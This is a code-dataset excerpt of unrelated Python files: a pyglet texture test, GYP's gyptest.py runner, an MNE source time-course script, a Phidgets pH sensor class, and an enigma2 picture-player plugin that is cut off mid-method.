refs/heads/master
|
experimental/buffer/test_image.py
|
28
|
#!/usr/bin/python
# $Id:$
from pyglet.gl import *
from pyglet import graphics
from pyglet import image
from pyglet import window
win = window.Window()
kitten = image.load('examples/programming_guide/kitten.jpg').texture
batch = graphics.Batch()
t = kitten.tex_coords
w = kitten.width
h = kitten.height
batch.add(4, GL_QUADS, graphics.TextureState(kitten),
('v3f', (0., 0., 0.) + (w, 0., 0.) + (w, h, 0.) + (0., h, 0.)),
('t3f', t))
while not win.has_exit:
win.dispatch_events()
win.clear()
batch.draw()
win.flip()
|
johnservinis/node-gyp
|
refs/heads/master
|
gyp/gyptest.py
|
80
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
__doc__ = """
gyptest.py -- test runner for GYP tests.
"""
import os
import optparse
import shlex
import subprocess
import sys
class CommandRunner:
"""
Executor class for commands, including "commands" implemented by
Python functions.
"""
verbose = True
active = True
def __init__(self, dictionary={}):
self.subst_dictionary(dictionary)
def subst_dictionary(self, dictionary):
self._subst_dictionary = dictionary
def subst(self, string, dictionary=None):
"""
Substitutes (via the format operator) the values in the specified
dictionary into the specified command.
The command can be an (action, string) tuple. In all cases, we
perform substitution on strings and don't worry if something isn't
a string. (It's probably a Python function to be executed.)
"""
if dictionary is None:
dictionary = self._subst_dictionary
if dictionary:
try:
string = string % dictionary
except TypeError:
pass
return string
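  # Illustrative example (hypothetical dictionary): with
  # {'python': '/usr/bin/python'}, subst('%(python)s --version') returns
  # '/usr/bin/python --version'.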
def display(self, command, stdout=None, stderr=None):
if not self.verbose:
return
if type(command) == type(()):
func = command[0]
args = command[1:]
s = '%s(%s)' % (func.__name__, ', '.join(map(repr, args)))
    elif type(command) == type([]):
# TODO: quote arguments containing spaces
# TODO: handle meta characters?
s = ' '.join(command)
else:
s = self.subst(command)
if not s.endswith('\n'):
s += '\n'
sys.stdout.write(s)
sys.stdout.flush()
def execute(self, command, stdout=None, stderr=None):
"""
Executes a single command.
"""
if not self.active:
return 0
if type(command) == type(''):
command = self.subst(command)
cmdargs = shlex.split(command)
if cmdargs[0] == 'cd':
command = (os.chdir,) + tuple(cmdargs[1:])
if type(command) == type(()):
func = command[0]
args = command[1:]
return func(*args)
else:
if stdout is sys.stdout:
# Same as passing sys.stdout, except python2.4 doesn't fail on it.
subout = None
else:
# Open pipe for anything else so Popen works on python2.4.
subout = subprocess.PIPE
if stderr is sys.stderr:
# Same as passing sys.stderr, except python2.4 doesn't fail on it.
suberr = None
elif stderr is None:
# Merge with stdout if stderr isn't specified.
suberr = subprocess.STDOUT
else:
# Open pipe for anything else so Popen works on python2.4.
suberr = subprocess.PIPE
p = subprocess.Popen(command,
shell=(sys.platform == 'win32'),
stdout=subout,
stderr=suberr)
p.wait()
if stdout is None:
self.stdout = p.stdout.read()
elif stdout is not sys.stdout:
stdout.write(p.stdout.read())
if stderr not in (None, sys.stderr):
stderr.write(p.stderr.read())
return p.returncode
def run(self, command, display=None, stdout=None, stderr=None):
"""
Runs a single command, displaying it first.
"""
if display is None:
display = command
self.display(display)
return self.execute(command, stdout, stderr)
class Unbuffered:
def __init__(self, fp):
self.fp = fp
def write(self, arg):
self.fp.write(arg)
self.fp.flush()
def __getattr__(self, attr):
return getattr(self.fp, attr)
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
def find_all_gyptest_files(directory):
result = []
for root, dirs, files in os.walk(directory):
if '.svn' in dirs:
dirs.remove('.svn')
result.extend([ os.path.join(root, f) for f in files
if f.startswith('gyptest') and f.endswith('.py') ])
result.sort()
return result
def main(argv=None):
if argv is None:
argv = sys.argv
usage = "gyptest.py [-ahlnq] [-f formats] [test ...]"
parser = optparse.OptionParser(usage=usage)
parser.add_option("-a", "--all", action="store_true",
help="run all tests")
parser.add_option("-C", "--chdir", action="store", default=None,
help="chdir to the specified directory")
parser.add_option("-f", "--format", action="store", default='',
help="run tests with the specified formats")
parser.add_option("-G", '--gyp_option', action="append", default=[],
help="Add -G options to the gyp command line")
parser.add_option("-l", "--list", action="store_true",
help="list available tests and exit")
parser.add_option("-n", "--no-exec", action="store_true",
help="no execute, just print the command line")
parser.add_option("--passed", action="store_true",
help="report passed tests")
parser.add_option("--path", action="append", default=[],
help="additional $PATH directory")
parser.add_option("-q", "--quiet", action="store_true",
help="quiet, don't print test command lines")
opts, args = parser.parse_args(argv[1:])
if opts.chdir:
os.chdir(opts.chdir)
if opts.path:
extra_path = [os.path.abspath(p) for p in opts.path]
extra_path = os.pathsep.join(extra_path)
os.environ['PATH'] += os.pathsep + extra_path
if not args:
if not opts.all:
sys.stderr.write('Specify -a to get all tests.\n')
return 1
args = ['test']
tests = []
for arg in args:
if os.path.isdir(arg):
tests.extend(find_all_gyptest_files(os.path.normpath(arg)))
else:
tests.append(arg)
if opts.list:
for test in tests:
print test
sys.exit(0)
CommandRunner.verbose = not opts.quiet
CommandRunner.active = not opts.no_exec
cr = CommandRunner()
os.environ['PYTHONPATH'] = os.path.abspath('test/lib')
if not opts.quiet:
sys.stdout.write('PYTHONPATH=%s\n' % os.environ['PYTHONPATH'])
passed = []
failed = []
no_result = []
if opts.format:
format_list = opts.format.split(',')
else:
# TODO: not duplicate this mapping from pylib/gyp/__init__.py
format_list = {
'freebsd7': ['make'],
'freebsd8': ['make'],
'openbsd5': ['make'],
'cygwin': ['msvs'],
'win32': ['msvs', 'ninja'],
'linux2': ['make', 'ninja'],
'linux3': ['make', 'ninja'],
'darwin': ['make', 'ninja', 'xcode'],
}[sys.platform]
for format in format_list:
os.environ['TESTGYP_FORMAT'] = format
if not opts.quiet:
sys.stdout.write('TESTGYP_FORMAT=%s\n' % format)
gyp_options = []
for option in opts.gyp_option:
gyp_options += ['-G', option]
if gyp_options and not opts.quiet:
sys.stdout.write('Extra Gyp options: %s\n' % gyp_options)
for test in tests:
status = cr.run([sys.executable, test] + gyp_options,
stdout=sys.stdout,
stderr=sys.stderr)
if status == 2:
no_result.append(test)
elif status:
failed.append(test)
else:
passed.append(test)
if not opts.quiet:
def report(description, tests):
if tests:
if len(tests) == 1:
sys.stdout.write("\n%s the following test:\n" % description)
else:
fmt = "\n%s the following %d tests:\n"
sys.stdout.write(fmt % (description, len(tests)))
sys.stdout.write("\t" + "\n\t".join(tests) + "\n")
if opts.passed:
report("Passed", passed)
report("Failed", failed)
report("No result from", no_result)
if failed:
return 1
else:
return 0
if __name__ == "__main__":
sys.exit(main())
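# Example invocations (hypothetical paths; a sketch derived from the option
# parsing in main() above, not official documentation):
#   python gyptest.py -a                    # run every discovered gyptest*.py
#   python gyptest.py -f make,ninja test    # run tests under test/ in two formats
#   python gyptest.py -l test               # list the available tests and exit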
|
MadsJensen/RP_scripts
|
refs/heads/master
|
extract_ts_epochs.py
|
1
|
import sys
import numpy as np
import mne
from mne.minimum_norm import read_inverse_operator, apply_inverse_epochs
from my_settings import (mne_folder, epochs_folder, source_folder, conditions)
subject = sys.argv[1]
method = "dSPM"
snr = 3.
lambda2 = 1. / snr**2
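# dSPM regularization follows the usual MNE convention lambda2 = 1 / SNR**2,
# so the assumed SNR of 3 gives lambda2 = 1/9.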
# labels = mne.read_labels_from_annot(
# subject=subject, parc="PALS_B12_Brodmann", regexp="Brodmann")
labels = mne.read_labels_from_annot(subject, parc="aparc")
for condition in conditions:
inv = read_inverse_operator(mne_folder + "%s_%s-inv.fif" % (subject,
condition))
epochs = mne.read_epochs(epochs_folder + "%s_%s-epo.fif" % (subject,
condition))
stcs = apply_inverse_epochs(
epochs["press"], inv, lambda2, method=method, pick_ori=None)
ts = [
mne.extract_label_time_course(
stc, labels, inv["src"], mode="mean_flip") for stc in stcs
]
# for h, tc in enumerate(ts):
# for j, t in enumerate(tc):
# t *= np.sign(t[np.argmax(np.abs(t))])
# tc[j, :] = t
# ts[h] = tc
ts = np.asarray(ts)
# stc.save(source_folder + "%s_%s_ar_epo" % (subject, condition))
np.save(source_folder + "ave_ts/%s_%s_ts_DKT_snr-3-epo.npy" %
(subject, condition), ts)
del epochs
del stcs
del ts
|
trevstanhope/row-assist
|
refs/heads/master
|
libs/python-phidget/Phidgets/Devices/PHSensor.py
|
11
|
"""Copyright 2012 Phidgets Inc.
This work is licensed under the Creative Commons Attribution 2.5 Canada License.
To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ca/
"""
__author__ = 'Adam Stelmack'
__version__ = '2.1.8'
__date__ = 'May 17 2010'
import threading
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Phidget import Phidget
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import PHChangeEventArgs
import sys
class PHSensor(Phidget):
"""This class represents a Phidget PH Sensor.
All methods to read PH data from the PH Sensor are implemented in this class.
The Phidget PH Sensor provides one standard PH sensor input.
See your device's User Guide for more specific API details, technical information, and revision details.
The User Guide, along with other resources, can be found on the product page for your device.
Extends:
Phidget
"""
def __init__(self):
"""The Constructor Method for the PHSensor Class
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
"""
Phidget.__init__(self)
self.__phChange = None
self.__onPhChange = None
try:
PhidgetLibrary.getDll().CPhidgetPHSensor_create(byref(self.handle))
except RuntimeError:
raise
if sys.platform == 'win32':
self.__PHCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_double)
elif sys.platform == 'darwin' or sys.platform == 'linux2':
self.__PHCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_double)
def __del__(self):
"""The Destructor Method for the PHSensor Class
"""
Phidget.dispose(self)
def getPH(self):
"""Returns the measured pH.
This value can range between getPHMin and getPHMax, but some of this range is likely outside of the valid range of most pH sensors.
For example, when there is no pH sensor attached, the board will often report an (invalid) pH of 15, which, while technically within a valid
pH range, is unlikely to be seen.
Returns:
The current pH reading <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
phVal = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPH(self.handle, byref(phVal))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return phVal.value
def getPHMax(self):
"""Returns the maximum ph that will be returned by the ph sensor input.
Returns:
The Maximum pH readable <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
phMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPHMax(self.handle, byref(phMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return phMax.value
def getPHMin(self):
"""Returns the minimum ph that will be returned by the ph sensor input.
Returns:
The Minimum pH readable <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
phMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPHMin(self.handle, byref(phMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return phMin.value
def __nativePHChangeEvent(self, handle, usrptr, value):
if self.__phChange != None:
self.__phChange(PHChangeEventArgs(self, value))
return 0
def setOnPHChangeHandler(self, phChangeHandler):
"""Sets the PHChange Event Handler.
The ph change handler is a method that will be called when the pH has changed by at least the Trigger that has been set.
Parameters:
phChangeHandler: hook to the phChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
if phChangeHandler == None:
self.__phChange = None
self.__onPhChange = None
else:
self.__phChange = phChangeHandler
self.__onPhChange = self.__PHCHANGEHANDLER(self.__nativePHChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_set_OnPHChange_Handler(self.handle, self.__onPhChange, None)
except RuntimeError:
self.__phChange = None
self.__onPhChange = None
raise
if result > 0:
raise PhidgetException(result)
def getPHChangeTrigger(self):
"""Returns the pH change trigger.
This is how much the pH must change between successive PHChangeEvents. By default this value is set to 0.05.
Returns:
The current pH change Trigger <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
sensitivity = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPHChangeTrigger(self.handle, byref(sensitivity))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return sensitivity.value
def setPHChangeTrigger(self, value):
"""Sets the pH change trigger.
This is how much the pH must change between successive PHChangeEvents. By default this value is set to 0.05.
Parameters:
value<double>: The requested pH change trigger value.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or the trigger value is out of range.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_setPHChangeTrigger(self.handle, c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getPotential(self):
"""Returns the Potential, in millivolts.
This returns the actual voltage potential measured by the A/D.
This value will always be between getPotentialMin and getPotentialMax.
This is the value that is internally used to calculate pH in the library.
Returns:
The current potential <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
potential = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPotential(self.handle, byref(potential))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return potential.value
def getPotentialMax(self):
"""Returns the maximum potential that will be returned by the ph sensor input.
Returns:
The Maximum potential in millivolts <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
potentialMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPotentialMax(self.handle, byref(potentialMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return potentialMax.value
def getPotentialMin(self):
"""Returns the minimum potential that will be returned by the ph sensor input.
Returns:
The Minimum potential in millivolts <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
potentialMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPotentialMin(self.handle, byref(potentialMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return potentialMin.value
def setTemperature(self, value):
"""Sets the probe temperature in degrees celcius.
This value is used while calculating the PH. The default value in the libary is 20 degrees celcius.
If the temperature of the liquid being measured is not 20 degrees, then it should be measued and set for maximum accuracy.
Note: All that this does is set a value in the library that is used for calculating ph. This does not set anything in the hardware itself.
Parameters:
value<double>: the requested temperature.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_setTemperature (self.handle, c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
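# A minimal usage sketch (not part of the original module; assumes a pH sensor
# board is attached and that openPhidget()/waitForAttach()/closePhidget() are
# inherited from Phidget, as in the other Phidgets device classes):
#
#   sensor = PHSensor()
#   sensor.openPhidget()
#   sensor.waitForAttach(10000)  # milliseconds
#   print sensor.getPH()
#   sensor.closePhidget()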
|
kingvuplus/b-p
|
refs/heads/master
|
lib/python/Plugins/Extensions/PicturePlayer/ui.py
|
17
|
from enigma import ePicLoad, eTimer, getDesktop, gMainDC, eSize
from Screens.Screen import Screen
from Tools.Directories import resolveFilename, pathExists, SCOPE_MEDIA, SCOPE_CURRENT_SKIN
from Components.Pixmap import Pixmap, MovingPixmap
from Components.ActionMap import ActionMap, NumberActionMap
from Components.Sources.StaticText import StaticText
from Components.FileList import FileList
from Components.AVSwitch import AVSwitch
from Components.Sources.List import List
from Components.ConfigList import ConfigList, ConfigListScreen
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigSelection, ConfigText, ConfigYesNo, KEY_LEFT, KEY_RIGHT, KEY_0, getConfigListEntry
import skin
def getScale():
return AVSwitch().getFramebufferScale()
config.pic = ConfigSubsection()
config.pic.framesize = ConfigInteger(default=30, limits=(5, 99))
config.pic.slidetime = ConfigInteger(default=10, limits=(1, 60))
config.pic.resize = ConfigSelection(default="1", choices = [("0", _("simple")), ("1", _("better"))])
config.pic.cache = ConfigYesNo(default=True)
config.pic.lastDir = ConfigText(default=resolveFilename(SCOPE_MEDIA))
config.pic.infoline = ConfigYesNo(default=True)
config.pic.loop = ConfigYesNo(default=True)
config.pic.bgcolor = ConfigSelection(default="#00000000", choices = [("#00000000", _("black")),("#009eb9ff", _("blue")),("#00ff5a51", _("red")), ("#00ffe875", _("yellow")), ("#0038FF48", _("green"))])
config.pic.autoOrientation = ConfigYesNo(default=False)
config.pic.textcolor = ConfigSelection(default="#0038FF48", choices = [("#00000000", _("black")),("#009eb9ff", _("blue")),("#00ff5a51", _("red")), ("#00ffe875", _("yellow")), ("#0038FF48", _("green"))])
class picshow(Screen):
skin = """
<screen name="picshow" position="center,center" size="560,440" title="Picture player" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
<widget source="label" render="Label" position="5,55" size="350,140" font="Regular;19" backgroundColor="#25062748" transparent="1" />
<widget name="thn" position="360,40" size="180,160" alphatest="on" />
<widget name="filelist" position="5,205" zPosition="2" size="550,230" scrollbarMode="showOnDemand" />
</screen>"""
def __init__(self, session):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions", "DirectionActions", "MenuActions"],
{
"cancel": self.KeyExit,
"red": self.KeyExit,
"green": self.KeyGreen,
"yellow": self.KeyYellow,
"menu": self.KeyMenu,
"ok": self.KeyOk
}, -1)
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Thumbnails"))
self["key_yellow"] = StaticText("")
self["label"] = StaticText("")
self["thn"] = Pixmap()
currDir = config.pic.lastDir.value
if not pathExists(currDir):
currDir = "/"
self.filelist = FileList(currDir, matchingPattern = "(?i)^.*\.(jpeg|jpg|jpe|png|bmp|gif)")
self["filelist"] = self.filelist
self["filelist"].onSelectionChanged.append(self.selectionChanged)
self.ThumbTimer = eTimer()
self.ThumbTimer.callback.append(self.showThumb)
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.showPic)
self.onLayoutFinish.append(self.setConf)
def showPic(self, picInfo=""):
ptr = self.picload.getData()
if ptr != None:
self["thn"].instance.setPixmap(ptr.__deref__())
self["thn"].show()
text = picInfo.split('\n',1)
self["label"].setText(text[1])
self["key_yellow"].setText(_("Exif"))
def showThumb(self):
if not self.filelist.canDescent():
if self.filelist.getCurrentDirectory() and self.filelist.getFilename():
if self.picload.getThumbnail(self.filelist.getCurrentDirectory() + self.filelist.getFilename()) == 1:
self.ThumbTimer.start(500, True)
def selectionChanged(self):
if not self.filelist.canDescent():
self.ThumbTimer.start(500, True)
else:
self["label"].setText("")
self["thn"].hide()
self["key_yellow"].setText("")
def KeyGreen(self):
#if not self.filelist.canDescent():
self.session.openWithCallback(self.callbackView, Pic_Thumb, self.filelist.getFileList(), self.filelist.getSelectionIndex(), self.filelist.getCurrentDirectory())
def KeyYellow(self):
if not self.filelist.canDescent():
self.session.open(Pic_Exif, self.picload.getInfo(self.filelist.getCurrentDirectory() + self.filelist.getFilename()))
def KeyMenu(self):
self.session.openWithCallback(self.setConf, Pic_Setup)
def KeyOk(self):
if self.filelist.canDescent():
self.filelist.descent()
else:
self.session.openWithCallback(self.callbackView, Pic_Full_View, self.filelist.getFileList(), self.filelist.getSelectionIndex(), self.filelist.getCurrentDirectory())
def setConf(self, retval=None):
self.setTitle(_("Picture player"))
sc = getScale()
#setPara: 0=width 1=height 2/3=aspect scale 4=use_cache 5=resize_type 6=background(#AARRGGBB) 7=auto_orientation
self.picload.setPara((self["thn"].instance.size().width(), self["thn"].instance.size().height(), sc[0], sc[1], config.pic.cache.value, int(config.pic.resize.value), "#00000000", config.pic.autoOrientation.value))
def callbackView(self, val=0):
if val > 0:
self.filelist.moveToIndex(val)
def KeyExit(self):
del self.picload
if self.filelist.getCurrentDirectory() is None:
config.pic.lastDir.value = "/"
else:
config.pic.lastDir.value = self.filelist.getCurrentDirectory()
config.pic.save()
self.close()
#------------------------------------------------------------------------------------------
class Pic_Setup(Screen, ConfigListScreen):
def __init__(self, session):
Screen.__init__(self, session)
# for the skin: first try MediaPlayerSettings, then Setup, this allows individual skinning
self.skinName = ["PicturePlayerSetup", "Setup"]
self.setup_title = _("Settings")
self.onChangedEntry = []
self.session = session
ConfigListScreen.__init__(self, [], session = session, on_change = self.changedEntry)
self["actions"] = ActionMap(["SetupActions", "MenuActions"],
{
"cancel": self.keyCancel,
"save": self.keySave,
"ok": self.keySave,
"menu": self.closeRecursive,
}, -2)
self["key_red"] = StaticText(_("Cancel"))
self["key_green"] = StaticText(_("OK"))
self.createSetup()
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setTitle(self.setup_title)
def createSetup(self):
setup_list = [
getConfigListEntry(_("Slide show interval (sec.)"), config.pic.slidetime),
getConfigListEntry(_("Scaling mode"), config.pic.resize),
getConfigListEntry(_("Cache thumbnails"), config.pic.cache),
getConfigListEntry(_("Show info line"), config.pic.infoline),
getConfigListEntry(_("Frame size in full view"), config.pic.framesize),
getConfigListEntry(_("Slide picture in loop"), config.pic.loop),
getConfigListEntry(_("Background color"), config.pic.bgcolor),
getConfigListEntry(_("Text color"), config.pic.textcolor),
getConfigListEntry(_("Fulview resulution"), config.usage.pic_resolution),
getConfigListEntry(_("Auto EXIF Orientation rotation/flipping"), config.pic.autoOrientation),
]
self["config"].list = setup_list
self["config"].l.setList(setup_list)
def keyLeft(self):
ConfigListScreen.keyLeft(self)
def keyRight(self):
ConfigListScreen.keyRight(self)
# for summary:
def changedEntry(self):
for x in self.onChangedEntry:
x()
def getCurrentEntry(self):
return self["config"].getCurrent()[0]
def getCurrentValue(self):
return str(self["config"].getCurrent()[1].getText())
def createSummary(self):
from Screens.Setup import SetupSummary
return SetupSummary
#---------------------------------------------------------------------------
class Pic_Exif(Screen):
skin = """
<screen name="Pic_Exif" position="center,center" size="560,360" title="Info" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="menu" render="Listbox" position="5,50" size="550,310" scrollbarMode="showOnDemand" selectionDisabled="1" >
<convert type="TemplatedMultiContent">
{
"template": [ MultiContentEntryText(pos = (5, 5), size = (250, 30), flags = RT_HALIGN_LEFT, text = 0), MultiContentEntryText(pos = (260, 5), size = (290, 30), flags = RT_HALIGN_LEFT, text = 1)],
"fonts": [gFont("Regular", 20)],
"itemHeight": 30
}
</convert>
</widget>
</screen>"""
def __init__(self, session, exiflist):
Screen.__init__(self, session)
self["actions"] = ActionMap(["SetupActions", "ColorActions"],
{
"cancel": self.close
}, -1)
self["key_red"] = StaticText(_("Close"))
exifdesc = [_("filename")+':', "EXIF-Version:", "Make:", "Camera:", "Date/Time:", "Width / Height:", "Flash used:", "Orientation:", "User Comments:", "Metering Mode:", "Exposure Program:", "Light Source:", "CompressedBitsPerPixel:", "ISO Speed Rating:", "X-Resolution:", "Y-Resolution:", "Resolution Unit:", "Brightness:", "Exposure Time:", "Exposure Bias:", "Distance:", "CCD-Width:", "ApertureFNumber:"]
list = []
for x in range(len(exiflist)):
if x>0:
list.append((exifdesc[x], exiflist[x]))
else:
name = exiflist[x].split('/')[-1]
list.append((exifdesc[x], name))
self["menu"] = List(list)
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setTitle(_("Info"))
#----------------------------------------------------------------------------------------
T_INDEX = 0
T_FRAME_POS = 1
T_PAGE = 2
T_NAME = 3
T_FULL = 4
class Pic_Thumb(Screen):
def __init__(self, session, piclist, lastindex, path):
self.textcolor = config.pic.textcolor.value
self.color = config.pic.bgcolor.value
self.spaceX, self.picX, self.spaceY, self.picY, textsize, thumtxt = skin.parameters.get("PicturePlayerThumb",(35, 190, 30, 200, 20, 14))
pic_frame = resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/icons/pic_frame.png")
size_w = getDesktop(0).size().width()
size_h = getDesktop(0).size().height()
self.thumbsX = size_w / (self.spaceX + self.picX) # thumbnails in X
self.thumbsY = size_h / (self.spaceY + self.picY) # thumbnails in Y
self.thumbsC = self.thumbsX * self.thumbsY # all thumbnails
self.positionlist = []
skincontent = ""
posX = -1
for x in range(self.thumbsC):
posY = x / self.thumbsX
posX += 1
if posX >= self.thumbsX:
posX = 0
absX = self.spaceX + (posX*(self.spaceX + self.picX))
absY = self.spaceY + (posY*(self.spaceY + self.picY))
self.positionlist.append((absX, absY))
skincontent += "<widget source=\"label" + str(x) + "\" render=\"Label\" position=\"" + str(absX+5) + "," + str(absY+self.picY-textsize) + "\" size=\"" + str(self.picX - 10) + "," + str(textsize) \
+ "\" font=\"Regular;" + str(thumtxt) + "\" zPosition=\"2\" transparent=\"1\" noWrap=\"1\" foregroundColor=\"" + self.textcolor + "\" />"
skincontent += "<widget name=\"thumb" + str(x) + "\" position=\"" + str(absX+5)+ "," + str(absY+5) + "\" size=\"" + str(self.picX -10) + "," + str(self.picY - (textsize*2)) + "\" zPosition=\"2\" transparent=\"1\" alphatest=\"on\" />"
# Screen, backgroundlabel and MovingPixmap
self.skin = "<screen position=\"0,0\" size=\"" + str(size_w) + "," + str(size_h) + "\" flags=\"wfNoBorder\" > \
<eLabel position=\"0,0\" zPosition=\"0\" size=\""+ str(size_w) + "," + str(size_h) + "\" backgroundColor=\"" + self.color + "\" />" \
+ "<widget name=\"frame\" position=\"" + str(self.spaceX)+ "," + str(self.spaceY)+ "\" size=\"" + str(self.picX) + "," + str(self.picY) + "\" pixmap=\"" + pic_frame + "\" zPosition=\"1\" alphatest=\"on\" />" \
+ skincontent + "</screen>"
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions", "DirectionActions", "MovieSelectionActions"],
{
"cancel": self.Exit,
"ok": self.KeyOk,
"left": self.key_left,
"right": self.key_right,
"up": self.key_up,
"down": self.key_down,
"showEventInfo": self.StartExif,
}, -1)
self["frame"] = MovingPixmap()
for x in range(self.thumbsC):
self["label"+str(x)] = StaticText()
self["thumb"+str(x)] = Pixmap()
self.Thumbnaillist = []
self.filelist = []
self.currPage = -1
self.dirlistcount = 0
self.path = path
index = 0
framePos = 0
Page = 0
for x in piclist:
if x[0][1] == False:
self.filelist.append((index, framePos, Page, x[0][0], path + x[0][0]))
index += 1
framePos += 1
if framePos > (self.thumbsC -1):
framePos = 0
Page += 1
else:
self.dirlistcount += 1
self.maxentry = len(self.filelist)-1
self.index = lastindex - self.dirlistcount
if self.index < 0:
self.index = 0
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.showPic)
self.onLayoutFinish.append(self.setPicloadConf)
self.ThumbTimer = eTimer()
self.ThumbTimer.callback.append(self.showPic)
def setPicloadConf(self):
sc = getScale()
self.picload.setPara([self["thumb0"].instance.size().width(), self["thumb0"].instance.size().height(), sc[0], sc[1], config.pic.cache.value, int(config.pic.resize.value), self.color, config.pic.autoOrientation.value])
self.paintFrame()
def paintFrame(self):
#print "index=" + str(self.index)
if self.maxentry < self.index or self.index < 0:
return
pos = self.positionlist[self.filelist[self.index][T_FRAME_POS]]
self["frame"].moveTo( pos[0], pos[1], 1)
self["frame"].startMoving()
if self.currPage != self.filelist[self.index][T_PAGE]:
self.currPage = self.filelist[self.index][T_PAGE]
self.newPage()
def newPage(self):
self.Thumbnaillist = []
#clear Labels and Thumbnail
for x in range(self.thumbsC):
self["label"+str(x)].setText("")
self["thumb"+str(x)].hide()
#paint Labels and fill Thumbnail-List
for x in self.filelist:
if x[T_PAGE] == self.currPage:
self["label"+str(x[T_FRAME_POS])].setText("(" + str(x[T_INDEX]+1) + ") " + x[T_NAME])
self.Thumbnaillist.append([0, x[T_FRAME_POS], x[T_FULL]])
#paint Thumbnail start
self.showPic()
def showPic(self, picInfo=""):
for x in range(len(self.Thumbnaillist)):
if self.Thumbnaillist[x][0] == 0:
if self.picload.getThumbnail(self.Thumbnaillist[x][2]) == 1: # TODO: try again
self.ThumbTimer.start(500, True)
else:
self.Thumbnaillist[x][0] = 1
break
elif self.Thumbnaillist[x][0] == 1:
self.Thumbnaillist[x][0] = 2
ptr = self.picload.getData()
if ptr != None:
self["thumb" + str(self.Thumbnaillist[x][1])].instance.setPixmap(ptr.__deref__())
self["thumb" + str(self.Thumbnaillist[x][1])].show()
def key_left(self):
self.index -= 1
if self.index < 0:
self.index = self.maxentry
self.paintFrame()
def key_right(self):
self.index += 1
if self.index > self.maxentry:
self.index = 0
self.paintFrame()
def key_up(self):
self.index -= self.thumbsX
if self.index < 0:
self.index = self.maxentry
self.paintFrame()
def key_down(self):
self.index += self.thumbsX
if self.index > self.maxentry:
self.index = 0
self.paintFrame()
def StartExif(self):
if self.maxentry < 0:
return
self.session.open(Pic_Exif, self.picload.getInfo(self.filelist[self.index][T_FULL]))
def KeyOk(self):
